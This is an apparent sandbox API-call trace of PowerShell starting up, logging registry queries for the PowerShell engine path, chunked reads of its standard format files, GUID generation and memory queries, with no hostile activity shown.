	[0598.693] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x324) returned 0x0
	[0598.693] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0598.693] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a14a0
	[0598.693] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a14a0, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0598.694] CoTaskMemFree (pv=0x1b9a14a0) 
	[0598.694] RegCloseKey (hKey=0x324) returned 0x0
	[0598.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0598.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0598.706] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xf2ba0c3, Data2=0xad43, Data3=0x4ff6, Data4=([0]=0x9d, [1]=0xdd, [2]=0x5a, [3]=0xd, [4]=0x73, [5]=0xe4, [6]=0x16, [7]=0xf))) returned 0x0
	[0598.706] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x942270e9, Data2=0xd370, Data3=0x43c4, Data4=([0]=0xbd, [1]=0x71, [2]=0x92, [3]=0x75, [4]=0xcd, [5]=0x1e, [6]=0xcc, [7]=0x3c))) returned 0x0
	[0599.988] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x37a9dc92, Data2=0xa982, Data3=0x4a5c, Data4=([0]=0xa3, [1]=0xc7, [2]=0xf8, [3]=0xa5, [4]=0x2, [5]=0xfd, [6]=0x91, [7]=0x9a))) returned 0x0
	[0599.989] VirtualQuery (in: lpAddress=0x1eb340, lpBuffer=0x1ec200, dwLength=0x30 | out: lpBuffer=0x1ec200*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0599.990] VirtualQuery (in: lpAddress=0x1eb3d0, lpBuffer=0x1ec290, dwLength=0x30 | out: lpBuffer=0x1ec290*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0599.991] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd5cb1757, Data2=0xfb99, Data3=0x4fdd, Data4=([0]=0x94, [1]=0x53, [2]=0xe1, [3]=0xa, [4]=0x1b, [5]=0xbe, [6]=0x11, [7]=0xa2))) returned 0x0
	[0599.993] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd6de9847, Data2=0x9742, Data3=0x4e6d, Data4=([0]=0xa7, [1]=0x9b, [2]=0x80, [3]=0xd8, [4]=0x92, [5]=0x9d, [6]=0xdb, [7]=0x1c))) returned 0x0
	[0599.993] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x5ce550f3, Data2=0x3bc3, Data3=0x4fb1, Data4=([0]=0x90, [1]=0x6e, [2]=0x15, [3]=0xbc, [4]=0x95, [5]=0x7a, [6]=0x61, [7]=0x47))) returned 0x0
	[0600.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.007] VirtualQuery (in: lpAddress=0x1ebc50, lpBuffer=0x1ecb10, dwLength=0x30 | out: lpBuffer=0x1ecb10*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0600.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.009] VirtualQuery (in: lpAddress=0x1ebc50, lpBuffer=0x1ecb10, dwLength=0x30 | out: lpBuffer=0x1ecb10*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0600.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0600.012] VirtualQuery (in: lpAddress=0x1eb340, lpBuffer=0x1ec200, dwLength=0x30 | out: lpBuffer=0x1ec200*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0600.013] VirtualQuery (in: lpAddress=0x1eb3d0, lpBuffer=0x1ec290, dwLength=0x30 | out: lpBuffer=0x1ec290*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0600.015] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xae9ecbe2, Data2=0x6c81, Data3=0x4a36, Data4=([0]=0x82, [1]=0x19, [2]=0xea, [3]=0x25, [4]=0x9e, [5]=0xfa, [6]=0x3c, [7]=0x39))) returned 0x0
	[0600.015] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x51838006, Data2=0x7164, Data3=0x4220, Data4=([0]=0x86, [1]=0x8f, [2]=0x60, [3]=0x7d, [4]=0xe9, [5]=0x56, [6]=0x37, [7]=0x5))) returned 0x0
	[0600.016] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xb6c6287a, Data2=0x706d, Data3=0x445d, Data4=([0]=0x90, [1]=0x93, [2]=0xe5, [3]=0x86, [4]=0xe2, [5]=0x11, [6]=0xc9, [7]=0xef))) returned 0x0
	[0600.016] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xdef200b, Data2=0x17f3, Data3=0x4b66, Data4=([0]=0x85, [1]=0x3f, [2]=0xb3, [3]=0xf2, [4]=0x15, [5]=0xbf, [6]=0x7f, [7]=0x2f))) returned 0x0
	[0600.016] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x784eb6fc, Data2=0xa740, Data3=0x44de, Data4=([0]=0xac, [1]=0xea, [2]=0xe2, [3]=0xc7, [4]=0xba, [5]=0x1d, [6]=0x5d, [7]=0xdb))) returned 0x0
	[0600.016] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd82d7ad, Data2=0x628c, Data3=0x42b2, Data4=([0]=0x90, [1]=0x97, [2]=0xf2, [3]=0xc9, [4]=0xe8, [5]=0xc2, [6]=0xa4, [7]=0xa0))) returned 0x0
	[0600.016] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xbae7c683, Data2=0x583a, Data3=0x427c, Data4=([0]=0x8f, [1]=0x24, [2]=0x76, [3]=0xe0, [4]=0x27, [5]=0xd9, [6]=0xfb, [7]=0x7c))) returned 0x0
	[0600.017] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xc1a4ab13, Data2=0x8c99, Data3=0x425e, Data4=([0]=0xb1, [1]=0x9b, [2]=0xe9, [3]=0xe5, [4]=0x25, [5]=0x26, [6]=0xb0, [7]=0x20))) returned 0x0
	[0600.017] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x573a3556, Data2=0x742c, Data3=0x405e, Data4=([0]=0xbc, [1]=0xfa, [2]=0xf3, [3]=0x92, [4]=0x20, [5]=0x47, [6]=0xd8, [7]=0x9d))) returned 0x0
	[0600.018] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xefa7baf8, Data2=0x9b8c, Data3=0x49c9, Data4=([0]=0x8f, [1]=0xab, [2]=0x5, [3]=0xf5, [4]=0xef, [5]=0xa6, [6]=0x9f, [7]=0xd0))) returned 0x0
	[0600.019] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xcd3024c7, Data2=0x2d3f, Data3=0x4427, Data4=([0]=0x80, [1]=0xe, [2]=0x29, [3]=0x44, [4]=0x7d, [5]=0xa9, [6]=0x99, [7]=0x9d))) returned 0x0
	[0600.020] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xbda9e096, Data2=0xd5af, Data3=0x4248, Data4=([0]=0xbc, [1]=0x8a, [2]=0xa7, [3]=0xdf, [4]=0x33, [5]=0xeb, [6]=0xff, [7]=0xd7))) returned 0x0
	[0600.020] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x728b0149, Data2=0x890a, Data3=0x4e47, Data4=([0]=0x9c, [1]=0xa1, [2]=0x8b, [3]=0xfe, [4]=0x6a, [5]=0x65, [6]=0xc0, [7]=0x60))) returned 0x0
	[0600.020] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x698d7971, Data2=0x2191, Data3=0x42cc, Data4=([0]=0x8e, [1]=0x5b, [2]=0x40, [3]=0x51, [4]=0xca, [5]=0x55, [6]=0x52, [7]=0xfb))) returned 0x0
	[0600.020] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xbe7f05af, Data2=0x3311, Data3=0x4a20, Data4=([0]=0x8a, [1]=0x92, [2]=0xee, [3]=0x20, [4]=0x52, [5]=0xfd, [6]=0xa7, [7]=0x40))) returned 0x0
	[0600.021] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x6b97a45f, Data2=0x126f, Data3=0x43d7, Data4=([0]=0x85, [1]=0x47, [2]=0x13, [3]=0x2, [4]=0xa6, [5]=0xc, [6]=0x6f, [7]=0xc0))) returned 0x0
	[0600.021] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xa3178cd, Data2=0x9708, Data3=0x499a, Data4=([0]=0xa0, [1]=0x99, [2]=0xe4, [3]=0x82, [4]=0xa8, [5]=0x8a, [6]=0xef, [7]=0xe4))) returned 0x0
	[0600.021] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xc903cd49, Data2=0x6e89, Data3=0x4115, Data4=([0]=0xad, [1]=0x56, [2]=0xbc, [3]=0x8, [4]=0x81, [5]=0x12, [6]=0x33, [7]=0x89))) returned 0x0
	[0600.021] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xf34cbd34, Data2=0xfb10, Data3=0x44f1, Data4=([0]=0xa8, [1]=0x8f, [2]=0xe6, [3]=0x18, [4]=0xb4, [5]=0x1e, [6]=0x6c, [7]=0x26))) returned 0x0
	[0600.021] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0600.022] GetFileType (hFile=0x324) returned 0x1
	[0600.022] SetErrorMode (uMode=0x1) returned 0x1
	[0600.022] GetFileType (hFile=0x324) returned 0x1
	[0600.022] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.664] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.664] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.664] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.665] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.665] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.665] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.665] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.665] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.668] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.668] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.669] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.669] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.670] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.670] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.670] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.671] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.674] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.675] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.675] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.675] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0601.676] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0xe67, lpOverlapped=0x0) returned 1
	[0601.676] ReadFile (in: hFile=0x324, lpBuffer=0x3030277, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030277*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0601.676] ReadFile (in: hFile=0x324, lpBuffer=0x3030ca8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x3030ca8*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0601.676] CloseHandle (hObject=0x324) returned 1
	[0601.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0601.677] SetErrorMode (uMode=0x1) returned 0x1
	[0601.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0601.677] SetErrorMode (uMode=0x1) returned 0x1
	[0601.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0601.677] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x324) returned 0x0
	[0601.677] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0601.677] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a14a0
	[0601.678] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a14a0, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0601.678] CoTaskMemFree (pv=0x1b9a14a0) 
	[0601.678] RegCloseKey (hKey=0x324) returned 0x0
	[0601.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0601.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xa4eb5389, Data2=0x9f45, Data3=0x4ff0, Data4=([0]=0x87, [1]=0x3e, [2]=0x3b, [3]=0xe4, [4]=0x39, [5]=0x81, [6]=0x36, [7]=0xa3))) returned 0x0
	[0601.693] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x1c48d860, Data2=0x9c37, Data3=0x4ca0, Data4=([0]=0xa2, [1]=0x31, [2]=0xb6, [3]=0x15, [4]=0x31, [5]=0xca, [6]=0xcd, [7]=0x8c))) returned 0x0
